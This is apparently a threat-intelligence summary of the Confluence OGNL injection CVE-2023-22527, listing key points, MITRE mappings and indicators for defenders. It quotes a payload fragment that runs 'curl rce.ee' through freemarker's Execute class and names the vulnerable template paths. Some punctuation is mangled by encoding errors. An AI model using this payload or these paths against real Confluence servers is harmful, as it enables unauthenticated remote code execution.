CVE-2023-22527 is a critical OGNL injection vulnerability in Atlassian Confluence Server and Data Center that can allow unauthenticated attackers to inject OGNL expressions and execute arbitrary code. Security researchers detail how unauthenticated access to Velocity template files enables remote code execution and note patches in newer Confluence versions, with detection templates released to help mitigate the issue. #CVE-2023-22527 #AtlassianConfluence #OGNLInjection #ConfluenceRCE #ProjectDiscovery #NucleiTemplate
Keypoints
- CVE-2023-22527 is a critical vulnerability affecting Atlassian Confluence Server and Data Center that permits unauthenticated OGNL injection and remote code execution.
- Attack surface includes rendering Velocity templates and directly accessing *.vm files, not just through standard application actions.
- Researchers found OGNL sinks in template files (e.g., pagelist.vm, text-inline.vm) that pass parameters into OGNL expressions, enabling injection when parameters are crafted.
- Exploitation involves reaching OGNL evaluation by bypassing Struts sandboxing, including using the OGNL library to call findValue via the OGNL tool.
- Payloads demonstrated how to execute OS commands (e.g., via freemarker.template.utility.Execute)) and bypass length restrictions with parameterized inputs.
- A Nuclei detection template has been created to help identify CVE-2023-22527, contributed by the ProjectDiscovery community.
- Patched versions (and guidance to update) mitigate the root cause; latest Confluence versions are not affected.
MITRE Techniques
- [T1190] Exploit Public-Facing Application β Unauthenticated attackers inject OGNL expressions into Confluence to enable code and command execution. Quote: βThis vulnerability has the potential to permit unauthenticated attackers to inject OGNL expressions into the Confluence instance, thereby enabling the execution of arbitrary code and system commands.β
- [T1059.004] Unix Shell β OGNL-based execution flows call OS commands via freemarker Execute, e.g., ββ¦ (new freemarker.template.utility.Execute()).exec({βcurl rce.eeβ})β to run commands. Quote: βNext, we simply looked for any findValue callsβ¦ and to our surprise we found one in confluence/template/aui/text-inline.vm.β
Indicators of Compromise
- [URL] context β http://localhost/template/aui/text-inline.vm, http://localhost/template/xhtml/pagelist.vm
- [Domain] context β rce.ee
- [File name] context β pagelist.vm, text-inline.vm
Read more: https://blog.projectdiscovery.io/atlassian-confluence-ssti-remote-code-execution/